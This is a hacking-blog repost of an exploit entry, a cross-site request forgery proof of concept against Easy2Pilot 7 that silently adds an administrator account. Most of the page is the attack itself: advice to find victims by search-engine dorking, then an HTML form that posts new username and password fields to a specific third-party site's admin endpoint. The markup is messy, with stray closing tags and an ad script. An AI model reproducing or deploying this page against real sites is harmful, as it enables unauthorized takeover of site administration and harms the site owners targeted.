Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    863102124

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

# Exploit Title: Easy2Pilot 7 - Cross-Site Request Forgery (Add User)
# Author: indoushka
# Date: 2020-02-20
# Tested on: windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)
# Vendor: http://easy2pilot-v7.com/
# CVE: N/A

#poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] save code as poc.html

[+] 

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://www.w3.org/2005/10/profile">
<script data-ad-client="ca-pub-6748326038387042" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
</tr>
                    </table>
                <br/><br/>
        <form action="https://immosl.lu/admin.php?action=add_user" method="POST">
            <table class="modif_utilisateur" border="0" cellpadding="3" cellspacing="0" width="350">
                <tr>
                    <td class="tah11" colspan="2" align="center"><B>Nouvel utilisateur : </B></td>
                </tr>
                <tr>
                    <td class="tah11" align="right">Nom d'utilisateur :</td>
                    <td class="tah11" align="left"><input type="text" name="user" class="form-control" value=""></td>
                </tr>
                <tr>
                    <td class="tah11" align="right">Mot de passe : </td>
                    <td class="tah11" align="left"><input type="text" name="pass" class="form-control" value=""></td>
                </tr>
                <tr>
                    <td class="tah11" colspan="2" align="center"><input class="btn btn-lg btn-primary" type="submit" value="Ajouter"></td>
                </tr>
            </table>
        </form><br/><br/>
<div>
	

Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |        
                                                                                                                                      |
=======================================================================================================================================